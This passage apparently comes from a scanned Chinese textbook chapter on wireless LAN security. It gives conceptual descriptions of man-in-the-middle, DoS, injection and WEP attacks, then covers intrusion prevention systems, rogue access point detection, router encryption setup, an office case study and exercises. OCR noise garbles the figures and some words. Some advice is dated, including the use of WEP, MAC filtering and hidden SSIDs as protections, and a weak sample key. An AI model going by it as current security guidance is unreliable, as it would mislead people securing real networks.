拟 放置 在 网 络 连 接 中 的 两 台 通 信 计 算 机 之 间 ， 这 人 台 计 算 机 就 称 为 “中 间 人 ”。 从 中 间 人 攻 
击 概念 中 你 会 发 现 ， 为 达到 中 间 人 攻击 的 目的 ， 必 须 具备 两 个 技术 条 件 ， 首 先 就 要 让 本 来 
应 该 互相 通信 的 双方 的 数据 流量 都 从 攻击 者 处 转发 或 中 继 ， 称 为 流量 牵引 ， 其 次 ， 流 量 牵 
引 过 来 了 攻击 者 还 要 让 通信 双方 对 他 没有 任何 怀疑 ， 这 里 称 为 身份 伪装 。 在 有 线 网 络 环境 
中 ， 流 量 牵 引 不 太 容 易 。 局 域 网 中 需要 使 用 ARP 欺骗 技术 ， 而 广域网 中 需要 使 用 DNS 其 
骗 技 术 ， 容 易 被 防护 ， 也 容易 被 发 现 。 在 WiFi 的 环境 中 ， 达 到 中 间 人 攻击 技术 条 件 非 常 
容易 ， 攻 击 者 只 需要 使 用 跟 合 法 接 入 点 同样 的 SSID( 如 果 加 密 的 话 ， 还 要 认证 /加 密 算法 相 
同 ， 并 且 预 共享 密 钥 相 同 )， 然 后 让 伪造 接 入 点 的 功率 大 于 合法 接 入 点 (相对 被 攻击 者 而 言 ) 
就 可 以 了 。 攻 击 者 再 以 客户 端的 身份 连接 到 合法 接 入 点 ， 在 中 间 中 转 被 攻击 者 与 合法 接 入 点 
之 间 的 流量 ， 数 据 都 能 够 被 明文 监听 下 来 ， 或 者 进一步 实施 更 高 级 的 攻击 手段 。 无 线 网 络 中 
的 中 间 人 攻击 示意 如 图 8-8 所 示 。 

(7) DoS(Denial of Service， 拒 绝 服务 ): 这 是 一 种 利用 大 量 的 虚拟 信息 流 耗 尽 目标 主 
机 的 资源 ， 目 标 主机 被 迫 全 力 处 理 虚 假 信息 流 ， 从 而 使 合法 用 户 无 法 得 到 服务 响应 的 网 络 
攻击 行为 。 在 正常 情况 下 ， 路 由 器 的 速度 将 会 因为 这 种 攻击 导致 运行 速度 降低 。DoS 本 身 
几乎 不 会 将 安全 数据 暴露 给 黑客 ， 因 为 此 时 网 络 中 断 ， 阻 止 了 被 保护 的 数据 流 的 传递 。 使 
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用 DoS 攻击 的 实际 目的 往往 是 监听 无 线 网 络 的 恢复 过 程 ， 在 此 过 程 中 所 有 最 初 的 握手 信息 
都 会 被 重新 发 送 ， 黑 客 获取 这 些 握手 信息 并 加 以 分 析 ， 寻 找 安全 漏洞 。 这 种 攻击 方法 对 
于 WEP 加 密 的 网 络 系统 比较 有 效 。 针 对 WEP 加 密 ， 有 很 多 字典 形式 的 密码 破解 工具 可 
以 使 用 。 






使 用 下 合法 接 入 


同样 的 SSID 






图 8-8 中 间 人 攻击 


(8) 网 络 注入 : 黑客 使 用 网 络 注入 可 以 攻击 不 带 有 过 滤 网 络 流量 功能 的 AP， 特 别 是 
广播 网 络 流量 如 “生成 树 ” 协 议 (802.1D)，OSPF(Open Shortest Path First， 开 放 式 最 短路 径 
优先 ) 协 议 ， 路 由 信息 协议 (RIP)， 热 备份 路 由 器 协议 (HSRP)。 注 入 可 以 伪造 网 络 重新 配置 
命令 重 配置 命令 ， 这 些 命令 能 够 影响 到 路 由 器 、 交 换 机 、 智 能 中 心 。 注 入 可 以 破坏 整个 网 
络 ， 此 时 网 络 需 要 重启 甚至 只 能 对 所 有 网 络 设备 重新 编程 。 

(9) 牛奶 咖啡 攻击 (caffe latte attack) 这 是 另 一 种 针对 WEP 加 密 的 攻击 方式 。 这 种 方式 
并 不 是 必要 的 攻击 手段 。 通 过 对 Windows 无 线 堆栈 实施 攻击 ， 可 以 从 远程 客户 端 获得 
WEP 密 钥 ， 再 通过 ARP 攻击 ， 黑 客 可 以 利用 WEP 的 共享 密 钥 身份 认证 和 消息 修改 漏洞 。 


8.3.3 无 线 入 侵 防御 


从 源头 上 保证 无 线 网 络 安全 ， 应 当 在 最 初 做 好 入 侵 防御 工作 。 针 对 不 同 的 无 线 网 络 环 
境 ， 入 侵 防 御 的 等 级 和 设置 操作 有 所 不 同 。 

对 无 线 网 络 入 侵 防 御 的 整体 思路 主要 是 : 首先 一 定 要 控制 进入 网 络 的 资格 ， 即 认证 ; 
其 次 ， 保 护 以 无 线 方式 发 送 的 信息 ， 即 数据 加 密 。 

对 于 封闭 网 络 (家 庭 和 组 织 的 局 域 网 )， 最 常见 的 方法 是 对 接 入 点 AP 设置 访问 限制 ， 
限制 手段 包括 使 用 口令 和 MAC 地 址 过 滤 。 另 一 种 方法 是 关闭 SSID 广播 ， 使 得 AP 难以 被 
外 界 侦 测 到 。 无 线 入 侵 防御 系统 可 以 保障 局 域 网 安全 。 

对 于 商业 网 络 提供 商 、 热 点 和 规模 较 大 的 组 织 ， 网 络 提供 者 更 偏向 于 使 用 开放 、 不 加 
密 但 是 完全 隔离 的 无 线 网 络 。 用 户 起 初 并 不 能 访问 互联 网 或 其 他 本 地 网 络 资源 。 商 业 网 络 
提供 商 进 一 步 为 用 户 提供 有 偿 的 互联 网 接 入 服务 。 另 一 个 方案 是 让 用 户 安全 连接 到 VPN。 
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无 线 网 络 安全 性 相对 于 有 线 网 络 较 差 ， 在 办 公 网 络 环境 中 ， 入 侵 者 能 够 轻易 入 侵 到 无 
线 网 络 中 ， 并 进一步 渗透 到 有 线 网 络 。 远 程 入 侵 者 也 可 以 通过 后 门 和 Back Orifice” 这 样 的 
软件 入 侵 网 络 。 通 常 的 解决 方式 是 端 到 端的 加 密 和 所 有 资源 限制 公开 访问 。 

其 他 一 些 具 体 的 防御 无 线 网 络 入 侵 的 方法 如 下 。 

(1) 正确 放置 网 络 的 接 入 点 设备 。 从 基础 做 起 ， 在 网 络 配置 中 ， 要 确保 无 线 接 入 点 放 
置 在 防火 墙 范围 之 外 。 

(2) 利用 MAC 防止 黑客 攻击 。 利 用 基于 MAC 地 址 的 ACLS( 访 问 控 制 表 ) 确 保 只 有 经 
过 注册 的 设备 才能 进入 网 络 。MAC 过 滤 技 术 就 如 同 给 系统 的 前 门 再 加 一 把 锁 ， 设 置 的 障 
碍 越 多 ， 越 会 使 黑客 知 难 而 退 ， 不 得 不 转 而 寻求 其 他 低 安全 性 的 网 络 。 

(3) WEP 协议 的 重要 性 。WEP 是 802.11b 无 线 局 域 网 的 标准 网 络 安全 协议 。 在 传输 信 
息 时 ，WEP 可 以 通过 加 密 无 线 传输 数据 来 提供 类 似 有 线 传输 的 保护 。 在 安装 和 启动 之 后 ， 
应 立即 更 改 WEP 密 钥 的 默认 值 。 最 理想 的 方式 是 WEP 的 密 钥 能 够 在 用 户 登录 后 进行 动态 
改变 ， 这 样 ， 黑 客 想 要 获得 无 线 网 络 的 数据 就 需要 不 断 跟踪 这 种 变化 。 基 于 会 话 和 用 户 的 
WEP 密 钥 管理 技术 能 够 实现 最 优 保护 ， 为 网 络 增加 另外 一 层 防范 。 

(4) VPN 是 最 好 的 网 络 安全 技术 之 一 。 如 果 每 一 项 安全 措施 都 是 阻挡 黑客 进入 网 络 前 
门 的 门 锁 ， 如 SSID 的 变化 、MAC 地 址 的 过 滤 功能 和 动态 改变 的 WEP 密 钥 ， 那 么 ， 虚 拟 
网 (VPN) 则 是 保护 网 络 后 门 安全 的 关键 。VPN 具有 比 WEP 协议 更 高 层 的 网 络 安全 性 (第 三 
层 )， 能 够 支持 用 户 和 网 络 间 端 到 端的 安全 隧道 连接 。 

(5) 简化 网 络 安全 管理 ， 集 成 无 线 和 有 线 网 络 安全 策略 。 无 线 网 络 安全 不 是 单独 的 网 
络 架构 ， 它 需要 各 种 不 同 的 程序 和 协议 。 制 定 结合 有 线 和 无 线 网 络 安全 的 策略 ， 能 够 提高 
管理 水 平 ， 降 低 管理 成 本 。 例 如 ， 不 论 用 户 是 通过 有 线 方式 还 是 无 线 方式 进入 网 络 ， 都 采 
用 集成 化 的 单一 用 户 ID 和 密码 。 

(6) 不 能 让 非 专业 人 员 构 建 无 线 网 络 。 尽 管 现在 无 线 局 域 网 的 构建 已 经 相当 方便 ， 非 
专业 人 员 可 以 在 自己 的 办 公 室 安装 无 线路 由 器 和 接 入 点 设备 ， 但 是 他 们 在 安装 过 程 中 很 少 
考虑 到 网 络 的 安全 性 ， 只 要 通过 网 络 探测 工具 扫描 网 络 ， 就 能 够 给 黑客 留 下 攻击 的 后 门 。 
因而 ， 在 没有 专业 系统 管理 员 同 意 和 参与 的 情况 下 ， 要 限制 无 线 网 络 的 构建 ， 这 样 才能 保 
证 无 线 网 络 的 安全 。 

(7) 禁止 SSID 广播 (隐藏 SSID)。 

(8) WEP 协议 不 是 万 能 的 ， 不 能 将 加 密 保 障 都 寄 希 望 于 WEP 协议 。WEP 只 是 多 层 网 
络 安 全 措施 中 的 一 层 ， 虽 然 这 项 技术 在 数据 加 密 中 具有 相当 重要 的 作用 ， 但 整个 网 络 的 安 
全 不 应 该 只 依赖 这 一 层 的 安全 性 能 。 

(9) 提高 已 有 的 RADIUS 服务 。 大 公司 的 远程 用 户 常 常 通过 RADIUS( 远 程 用 户 拨号 认 
证 服务 ) 实 现 网 络 认 证 登录 。 企 业 的 IT 网 络 管理 员 能 够 将 无 线 局 域 网 集成 到 已 经 存在 的 
RADIUS 架构 内 来 简化 对 用 户 的 管理 。 这 样 不 仅 能 实现 无 线 网 络 的 认证 ， 而 且 还 能 保证 无 
线 用 户 与 远程 用 户 使 用 同样 的 认证 方法 和 账号 。 





@ 简称 BO2K， 远 程控 制 软件 ， 可 以 察看 远 端 计算 机 的 内 容 。 上 载 或 下 载 文件 ， 察 看 所 有 密码 记 
录 ， 键 盘 记录 ， 对 远 端 计算 机 的 注册 表 进 行 修改 等 ， 功 能 强大 ， 具 有 几 百 项 设置 ， 界 面 简介 ， 操 作 简 单 . 
主要 用 于 管理 人 员 在 远 端 对 计算 机 或 服务 器 进行 调整 之 用 。 
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(10) WLAN 设备 不 全 都 一 样 尽管 802.11b 是 一 个 标准 的 协议 ， 所 有 获得 WiFi 标志 认 
证 的 设备 都 可 以 进行 基本 功能 的 通信 ， 但 不 是 所 有 这 样 的 无 线 设备 都 完全 对 等 。 虽 然 WiFi 
认证 保证 了 设备 间 的 互 操作 能 力 ， 但 许多 生产 商 的 设备 都 不 包括 增强 的 网 络 安全 功能 。 


8.3.4 无 线 入 侵 防御 系统 


针对 上 述 无 线 网 络 的 安全 问题 ， 用 户 应 当 采 取 有 效 的 无 线 网 络 安全 措施 和 方法 以 保护 
重要 的 数据 。 实 践 中 通常 使 用 无 线 入 侵 防 御 系 统 (Wireless Intrusion Prevention Systems， 
WIPS) 或 者 无 线 入 侵 监 测 系统 (Wireless Intrusion Detection Systems，WIDS) 来 保护 无 线 网 络 
安全 。 

在 计算 领域 ，WIPS(Wireless Intrusion Prevention System， 无 线 入 侵 防御 系统 ) 一 般 是 指 
能 够 监测 无 线 范围 内 未 授权 的 接 入 (入 侵 侦 测 )， 并 能 自动 采取 应 对 措施 (入 侵 防御 ) 的 网 络 
设备 。 

无 线 入 侵 防 御 系 统 是 抵御 无 线 安全 风险 的 最 强健 的 方式 。 

WIPS 主要 包括 入 侵 侦 测 和 入 侵 防御 功能 。 

无 线 入 侵 侦 测 系统 (Wireless Intrusion Detection System，WIDS) 监 控 无 线 范围 内 未 经 授 
权 、 伪 装 接 入 点 的 出 现 及 无 线 攻击 工具 的 使 用 。WIDS 监控 无 线 局 域 网 使 用 的 覆盖 范围 ， 
一 旦 发 现 伪 装 接 入 点 ， 便 立即 提醒 系统 管理 员 。 通 常 这 个 过 程 是 通过 比较 接 入 的 无 线 设备 
MAC 地 址 以 达到 侦 测 的 目标 。 

除了 入 侵 侦 测 之 外 ，WIPS 还 包括 自动 阻止 威胁 功能 。 提 到 自动 防御 ， 这 就 需要 WIPS 
能 精确 侦 测 并 自动 区 分 威胁 。 

一 个 优秀 的 WIPS 可 以 阻止 以 下 威胁 : 
伪装 接 入 点 一 一 WIPS 应 该 能 识别 伪装 接 入 点 与 外 部 (隔壁 ) 接 入 点 的 不 同 。 

误 配 置 的 接 入 点 。 
客户 端 异 常 关 联 。 
未 授权 的 关联 。 
中 间 人 攻击 。 

ad-hoc 网 络 。 

MAC 地 址 欺骗 。 
双 面 恶魔 攻击 。 
阻 断 服务 攻击 。 

一 个 WIPS 由 探测 器 、 服 务 器 和 控制 台 构成 。 探 测 器 使 用 天 线 等 无 线 电 设备 来 探测 受 
保护 区 域 的 无 线 数据 包 的 频谱 ， 服 务 器 用 来 分 析 探 测 器 捕获 的 数据 包 ; 控制 台 用 于 对 接 用 
户 与 系统 以 实现 管理 和 报告 。 

一 个 简单 的 入 侵 探测 系统 可 以 是 一 个 连接 有 无 线 信号 处 理 设备 和 覆盖 全 部 监控 范围 天 
线 的 工作 站 。 对 于 大 型 组 织 ， 则 采用 多 网 络 控制 器 控制 的 WIPS 服务 器 群 ， 对 于 SOHO 和 
SMB 这 样 的 微小 组 织 ， 专 门 的 盒子 类 型 设备 就 可 以 实现 WIPS 功能 。 

在 WIPS 的 应 用 中 ， 用 户 先 在 WIPS 中 配置 无 线 网 络 安全 参数 ， 探 测 器 随后 分 析 监 测 
范围 内 的 流量 并 传输 给 服务 器 ， 服 务 器 将 信息 与 安全 配置 参数 进行 对 比 后 进行 分 类 ， 判 断 
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其 是 否 属于 当前 描述 的 威胁 并 通知 管理 员 ， 或 者 采取 自动 保护 措施 。 

WIPS 可 应 用 于 局 域 网 内 ， 也 可 以 将 其 架设 在 互联 网 中 ， 以 实现 远程 保护 和 管理 。 

@ 局域网 WIPS: 在 WIPS 的 网 络 配置 方面 ， 探 测 器 、 服 务 器 和 控制 台 要 处 于 私有 
网 络 中 ， 与 互联 网 进行 隔离 。 探 测 器 与 服务 器 通过 专门 的 接口 连接 。 局 域 网 应 用 
适用 于 组 织 的 网 络 都 处 于 私有 网 络 中 。 

@ 远程 服务 器 WIPS: 在 远程 服务 器 WIPS 应 用 中 ， 探 测 器 在 私有 网 络 中 ， 而 服务 
器 则 被 置 于 远程 数据 中 心 ， 并 可 以 通过 互联 网 访问 。 远 程 服务 器 与 探测 器 之 间 、 
服务 器 与 控制 台 之 间 的 数据 经 过 SSL 等 加 密 传输 。 远 程 服务 器 的 WIPS 探测 器 可 
以 自动 查找 服务 器 ， 所 以 这 样 的 系统 只 需要 极 少 的 配置 ， 控 制 台 也 可 以 经 由 互联 
网 随时 随地 访问 。 远 程 服务 器 的 WIPS 是 一 种 节约 资源 、 可 以 按 需 配置 的 服务 。 


8.4 WLAN 非法 接 入 点 探测 与 处 理 
8.4.1 非法 接 入 点 的 危害 


非法 接 入 点 (rogue access poinb 是 指 未 经 许可 而 被 安装 的 接 入 点 。 它 可 能 会 给 安全 敏感 
的 企业 网 络 造成 一 个 后 门 (back door)， 从 而 对 企业 的 信息 安全 带 来 极 大 威胁 。 攻 击 者 可 以 
通过 后 门 对 一 个 保护 的 网 络 进行 访问 ， 从 而 绕 开 “前门 ”(ftont doon) 的 所 有 安全 措施 。 

非法 与 合法 这 两 种 接 入 点 的 区 别 在 于 ， 非 法 的 、 未 经 许可 的 接 入 点 往往 是 由 一 名 没有 
恶意 的 员工 私自 安装 ， 只 具备 有 限 的 安全 保护 措施 ， 通 常 保留 能 让 设备 即 插 即 用 的 不 安全 
的 默认 设置 ， 合 法 的 、 经 过 许可 的 接 入 点 往往 是 由 一 名 熟练 的 IT 工程 师 安装 ， 能 够 得 到 
完善 的 安全 支持 。 此 外 ， 合 法 接 入 点 设置 之 后 ， 往 往 能 通过 一 个 完善 的 身份 验证 过 程 保护 
无 线 信号 的 机 密 性 ， 而 员工 私自 安装 的 非法 接 入 点 可 能 无 法 支持 这 种 安全 机 制 ， 因 为 它 无 
法 访问 第 三 方 的 安全 服务 器 ， 也 就 是 无 法 提供 这 类 认证 服务 。 


8.4.2 ”非法 接 入 点 的 探测 方法 


个 人 用 户 和 企业 用 户 可 以 通过 安装 无 线 入 侵 防 御 系统 来 防范 非法 接 入 点 ， 该 系统 可 以 
探测 非法 接 入 点 的 无 线 射频 信号 。 

为 了 对 非法 接 入 点 进行 探测 ， 对 可 疑 接 入 点 考虑 以 下 两 点 。 

@ ”该 接 入 点 是 否 在 合法 接 入 点 列表 中 。 

@ ”该 接 入 点 是 否 连 接 在 安全 网 络 中 。 

对 于 第 一 点 ， 只 要 检查 接 入 点 的 MAC 地 址 是 否 存 在 于 合法 的 MAC 地 址 列表 中 。 对 
于 第 二 点 ， 情 况 相 对 复杂 一 些 ， 需 要 考虑 的 方面 包括 接 入 点 设备 的 类 型 ( 接 入 点 是 交换 机 还 
是 路 由 器 )、 无 线 连 接 的 加 密 情况 、 有 线 和 无 线 接 入 设备 MAC 地 址 间 的 关系 、 软 接 入 
点 等 。 

如 果 发 现 未 经 授权 的 接 入 点 连接 在 安全 网 络 中 ， 这 个 接 入 点 依然 是 非法 的 。 另 一 方 
面 ， 如 果 一 个 未 经 授权 的 接 入 点 未 连接 在 安全 网 络 中 ， 这 个 接 入 点 则 被 认为 是 一 个 外 部 接 
入 点 。 


[230. 





第 8 章 无 线 网 络 安全 惨 


8.4.3 ”非法 接 入 点 的 预防 


大 多 数 非 法 接 入 点 都 是 没有 恶意 的 员工 安装 的 , 他 们 只 是 想 在 工作 场所 中 访问 无 线 网 
络 。 要 防止 员工 安装 这 种 非法 接 入 点 ， 一 种 解决 方案 是 主动 为 他 们 提供 无 线 访问 服务 。 同 
时 ， 企 业 必须 制定 涵盖 无 线 网 络 的 安全 策略 ， 尤 其 是 要 禁止 使 用 个 人 安装 的 非法 接 入 点 。 
这 样 做 并 不 意味 着 要 停止 对 公司 网 络 的 核查 和 对 非法 接 入 点 的 检测 ， 而 是 为 了 减少 非法 接 
入 点 的 数量 ， 从 而 改善 整个 网 络 的 安全 性 。 


8.5 “小 型 案例 实 训 
8.5.1 Windows 7 无 线 网 络 安全 配置 


在 Windows 7 中 无 线 网 卡 安全 性 设置 提供 了 7 种 选择 : 无 身份 验证 (开放 式 )、 共 享 
式 、WPA2- 个 人 、WPA- 个 人 、WPA2- 企 业 、WPA- 企 业 、802.1X， 如 图 8-9 所 示 。 下 面 主 
要 介绍 几 种 安全 类 型 的 常识 以 及 选择 ， 以 及 配置 错误 所 带 来 的 问题 及 解决 。 

Tp-uNK 28c987 EE > 


连 撞 | 安全 








安全 类 型 中) 


加 E 类 型 0 i RR 
TEA2 - 个 
A 外 
WPA2 ~ 
TA 
选择 网络 身份 验证 广 


Microsoft， 爱 保护 的 EAP CEAP) =]| 设置 S) | 


园 每 次 登录 时 记 住 此 连接 的 任 据 BR) 





世 训 到 m 


记 枉 ja ] 
8-9 Windows 7 中 无 线 网 络 安全 属性 的 7 种 类 型 
1. 无 身份 验证 (开放 式 ) 


早期 的 WiFi 没有 提供 数据 加 密 ， 即 为 无 身份 认证 的 开放 式 无 线 网 络 ， 任 何 设备 不 需 
要 授权 即 可 连接 到 该 网 络 。 连 接 到 这 样 的 无 线 网 络 后 ， 系 统 里 的 无 线 连接 会 提示 “不 安 
全 ”， 因 为 通过 这 样 的 WiFi 进行 连接 很 容易 遭 到 窃听 。 

一 般 偶尔 需要 在 几 台 计算 机 之 间 建 立 临 时 的 对 等 网 络 的 时 候 会 选用 这 种 安全 类 型 。 

2. 共享 式 (WEP) 


可 以 使 用 WPA 或 WPA2 加 密 的 时 候 ， 一 般 不 使 用 WEP 加 密 类 型 。 
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3. WPA 


通过 前 文 对 WPA 的 介绍 我 们 可 以 知道 在 小 型 办 公 室 或 家 里 建立 无 线 网 络 时 ， 一 般 选 
择 WPA-PSK 安全 类 型 ， 采 用 AES 加 密 方 式 。 

较 新 的 网 卡 和 路 由 器 采用 IEEE 802.11n， 可 以 提供 较 高 的 带宽 (理论 上 可 以 达到 
600Mbps)， 但 是 IEEE 802.11n 标准 不 支持 以 WEP 加 密 ( 或 TKIP 加 密 算法 ) 单 播 密 码 的 
高 吞吐 率 。 也 就 是 说 ， 如 果 用 户 选择 了 共享 式 的 WEP 加 密 方式 或 者 TKIP 加 密 类 型 的 
WPA-PSK/WPA2-PSK 安全 类 型 ， 无 线 传输 速率 将 会 自动 降 至 802.11g 水 平 (理论 值 为 
54Mbps， 实 际 更 低 )。 如 果 用 户 使 用 的 是 802.11n 无 线 产品 ， 那 么 无 线 加 密 方式 只 能 选择 
WPA-PSK/WPA2-PSK 的 AES 算法 加 密 ， 否 则 无 线 传输 速率 将 会 自动 降低 。 如 果 终 端 使 
用 802.11g 标准 ， 至 少 应 该 选择 WEP 无 线 加密 。 

4. 802.1X 

类 似 于 企业 版 的 WPA，802.1X 也 需要 专门 的 认证 服务 器 来 对 WiFi 连接 进行 认证 。 
个 人 或 者 小 型 办 公 室 一 般 不 用 。 

在 Windows XP 系统 中 ， 微 软 将 802.1X 单独 列 出 来 ， 有 时 候 用 户 会 因为 选择 了 这 个 
认证 而 导致 无 法 连接 到 无 线 网 络 。 从 Windows 7 开始 ， 这 个 选项 已 经 与 其 他 几 种 安全 类 
型 并 列 在 一 起 ， 不 会 出 现 此 类 问题 。 


8.5.2 无 线路 由 器 的 加 密 配置 


无 线 网 络 的 加 密 配置 是 一 项 最 基本 的 保护 无 线 网 络 安全 的 手段 ， 下 面 以 TP-LINK 无 线 
路 由 器 为 例 讲解 一 下 无 线 网 络 的 加 密 安全 配置 。 

完整 的 WPA 实现 是 比较 复杂 的 ， 由 于 操作 过 程 比较 困难 (微软 针对 这 些 设 置 过 程 还 专 
门 开设 了 一 门 认证 课程 )， 一 般 用 户 自己 实现 是 不 太 现 实 的 。 在 普通 小 型 无 线 网 络 中 采用 的 
是 WPA 的 简化 版 一 -WPA-PSK( 预 共享 密 钥 )。 

TP-LINK 路 由 器 中 的 WPA 加 密 设 置 如 下 。 

(1) 设置 无 线 网 络 名 称 ， 如 图 8-10 所 示 。 


无 贱 网 阅 基本 设置 












































本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 。 
SSID 号 : angsan 修改 SSID 为 数 宇 ,| 字母 组 合 的 名 称 
信道 : 自动 和 
模式 : 11bgn mixed 
频段 带宽 : 自动 

固 开 启 无 线 功能 

轩 开启 ssID 广 播 

开局 YDs 
[|[ 民 去] [高 助 























图 8-10 ”路 由 器 中 的 无 线 网 络 名 称 设置 


(2) 设置 无 线 密码 ， 如 图 8-11 所 示 。 
选择 “无 线 设置 ”一 “无 线 安全 设置 ”菜单 命令 ， 打 开设 置 对 话 框 ， 选 中 WPA- 
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PSK/WPA2-PSK ， 认 证 类 型 选择 “自动 ”， 加 密 算 法 选择 AES( 实 际 中 请 选择 
WPA/WPA2)，PSK 密码 输入 至 少 8 位 的 密码 ， 单 击 “ 保 存 ” 按 钮 。 若 路 由 器 提示 重启 ， 
请 单 击 “ 重 启 ” 按 钮 并 重启 路 由 器 。 


® WPA-PSK/WPA2-PSK 











认证 类 型 : 自动 
加 窗 算 法 : AES 
SI 意 码 : 1a2b3c4d 答 入 至 少 8 位 的 密码 
( 8-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字 符 》 
姐 密 钥 更 新 周期 : 。 [86400 

















【 单位 为 秒 ,最 小 值 为 30, 不 更 新 则 为 0》 
图 8-11 路 由 器 AES 加 密 设置 
电脑 连接 路 由 器 并 登录 到 路 由 器 界面 ， 选 择 “ 无 线 设置 ”一 “基本 设置 ”菜单 命令 ， 
将 SSID 号 修改 为 数字 或 字母 组 合 的 名 称 ， 单 击 “ 保 存 ” 按 钮 。 


至 此 ，WPA-PSK 加 密 设置 完成 ， 无 线 网 络 已 经 处 于 WPA-PSK 加 密 保护 中 。 手 机 、 
电脑 等 可 以 搜索 该 无 线 信 号 、 输 入 设置 好 的 无 线 密码 即 可 连接 无 线 网 络 。 


8.5.3” 某 室内 区 域 无 线 网 络 搭建 


现 有 一 室内 办 公 区 域 需要 对 其 进行 无 线 网 络 覆 盖 ， 首 先 根据 办 公 区 域 的 形状 和 面积 确 
定 无 线 网 络 的 拓扑 结构 。 办 公 区 域 示意 图 和 无 线 网 络 的 拓扑 结构 如 图 8-12 所 示 。 











图 8-12 某 室 内 区 域 示 意图 和 无 线 网 络 覆 盖 示 意 
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接 下 来 将 对 相关 无 线 网 络 的 搭建 和 设置 情况 做 说 明 分 析 。 
1. 无 线 网 络 图 谱 结构 的 选择 


首先 决定 选用 的 无 线 AP 设备 是 思科 的 Aeronet 1000 无 线 AP。 根 据 该 产品 特性 ， 在 
802.11a 标准 下 保证 每 个 AP 最 大 传输 速率 的 覆盖 范围 半径 是 14 米 ， 而 在 802.11g 标准 下 
最 大 传输 距离 可 达 25 米 。 考 虑 到 用 户 需 要 在 不 同 AP 间 进 行 漫游 ， 设 置 每 两 个 可 产生 漫游 
的 AP 的 重 又 范围 应 达到 30%， 但 是 要 同时 保证 信号 不 会 冲突 ， 所 以 根据 办 公 区 域 的 形状 
与 面积 ， 选 择 至 少 两 个 信道 。 图 8-32 中 红色 和 绿色 分 别 表示 信道 1 和 信道 2。 


2. 设备 数量 选择 
根据 拓扑 结构 的 涉及 ， 确 定 AP 设备 数量 为 6 个 ， 每 个 AP 可 容纳 30 个 用 户 接 入 。 
3. 用 户 分 组 


该 区 域内 的 用 户 分 为 访客 组 、 员 工 组 和 网 络 电话 用 户 组 。 用 户 分 组 采用 VLAN 实现 ， 
每 个 组 的 VLAN 有 各 自 的 SSID 号 。 

1) 访客 组 

访客 组 不 属于 关键 用 户 ， 应 当 对 其 分 配 最 小 网 络 访问 权限 ， 如 只 能 访问 互联 网 而 不 能 
访问 内 部 网 络 。 但 是 访客 的 网 络 连接 应 当 具 有 便捷 的 特性 ， 所 以 可 设置 为 开放 连接 。 对 该 
组 的 访问 控制 通过 防火 墙 的 访问 控制 表 ACLs 进行 配置 。 

2) ”员工 组 

员工 组 应 当 有 相对 较 高 的 访问 权限 ， 但 是 需要 通过 建立 安全 连接 来 访问 。 在 员工 组 的 
连接 中 ， 使 用 WPA2 加 密 方式 ， 认 证 使 用 思科 的 LEAP 协议 。 在 LEAP 协议 中 ，AP 使 用 
一 个 外 部 的 远程 验证 拨号 用 户 服 务 (RADIUS) 服 务 器 来 实际 处 理 客户 端 认 证 。 实 际 上 ，AP 
和 无 线 客户 端 将 通过 RADIUS 服务 器 ， 利 用 交换 挑战 和 响应 来 相互 认证 ， 使 用 的 凭证 是 用 
户 名 和 密码 。 

3) ”网 络 电话 用 户 组 

网 络 电话 用 户 对 数据 传输 质量 很 敏感 ， 所 以 应 当 使 用 QoS( 服 务 质量 ) 机 制 来 保护 数 
据 。 同 时 应 当 保 证 该 分 组 的 数据 安全 。 但 大 多 数 电 话 都 不 支持 WPA2 加 密 ， 而 是 使 用 
WPA 加 密 ， 因 为 采用 WPA2 加 密 的 电话 设备 购置 成 本 很 高 ;同时 采用 LEAP 认证 协议 。 

4. 设备 和 协议 


访问 点 AP 使 用 6 个 思科 的 Aeronet 1000， 该 设备 有 较 好 的 覆盖 效果 ， 并 支持 所 有 需 
要 的 协议 。 每 个 AP 都 会 广播 3 个 SSID 以 实现 漫游 ， 且 SSID 将 与 一 个 VLAN 广播 域 匹 
配 ， 数 据 通 过 中 继 在 有 线 网 络 中 进行 传播 。AP 由 无 线 局 域 网 控制 器 WLC 控制 。 

无 线 控制 器 WLC 可 以 对 用 户 连 接 AP 的 情况 进行 控制 管理 。 每 一 个 AP 上 的 用 户 认证 
通过 802.1x 实现 ， 但 是 该 认证 由 WLC 基于 RADIUS 服务 器 来 控制 ， 所 以 还 要 使 用 路 由 器 
和 RADIUS 服务 器 设备 。 路 由 器 需要 置 入 访问 控制 列表 ACLs， 无 线 人 P 电话 需要 支持 
WPA 加 密 和 802.1x 协议 。 
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该 无 线 网 络 可 能 面临 的 威胁 


来 自 内 部 或 外 部 的 DOS 攻击 。 
干扰 无 线 信号 的 设备 。 
虚拟 局 域 网 跳跃 攻击 。 
访问 控制 列表 失效 。 
开放 网 络 中 的 数据 被 劫持 。 
这 些 威胁 可 以 根据 相应 的 安全 技术 、 安 全 管理 和 企业 内 部 安全 规定 等 来 减 小 或 者 
规避 。 


eeeg@eg@ oo 


本 章 小 结 


本 章 在 介绍 无 线 网 络 技术 和 无 线 网 络 设备 的 基础 上 ， 重 点 分 析 了 无 线 局 域 网 络 安全 技 
术 和 配置 ， 并 通过 无 线路 由 器 的 安全 配置 和 企业 无 线 非法 接 入 点 的 实例 ， 帮 助 读者 进一步 
从 实践 上 理解 无 线 网 络 的 结构 与 安全 保障 措施 。 读 者 应 当 在 理解 有 线 网 络 安全 知识 基础 上 
知晓 到 无 线 网 络 环境 的 差别 与 共同 之 处 ， 在 实践 中 做 到 有 的 放 矢 。 


习 题 


一 、 单 项 选择 题 


1. 下 列 哪 种 802.11 可 同时 工作 在 24GHz 和 5GHz 上 ?(  ) 
A. 802.11a B. 802.11ac C. 802.11n D. 802.11g 
2. 在 设计 点 对 点 (Ad Hoc) 模式 的 小 型 无 线 局 域 时 ， 应 选用 的 无 线 局 域 网 设备 是 


A. 无 线 网 卡 B. 无 线 接 入 点 ”C. 无 线 网 桥 D. 无 线路 由 器 
3. ”以 下 关于 无 线 局 域 网 硬件 设备 特征 的 描述 中 ，( ”) 是 错误 的 。 
A. 无 线 网 卡 是 无 线 局 域 网 中 最 基本 的 硬件 
B. 无 线 接 入 点 AP 的 基本 功能 是 集合 无 线 或 者 有 线 终端 ， 其 作用 类 似 于 有 线 局 
域 网 中 的 集线器 和 交换 机 
C. 无 线 接 入 点 可 以 增加 更 多 功能 ， 不 需要 无 线 网 桥 、 无 线路 由 器 和 无 线 网 关 
D. 无 线路 由 器 和 无 线 网 关 是 具有 路 由 功能 的 AP， 一 般 情况 下 它 具 有 NAT 功能 
4. WLAN 上 的 两 个 设备 之 间 使 用 的 无 线 网 络 标识 码 叫 (。”)。 
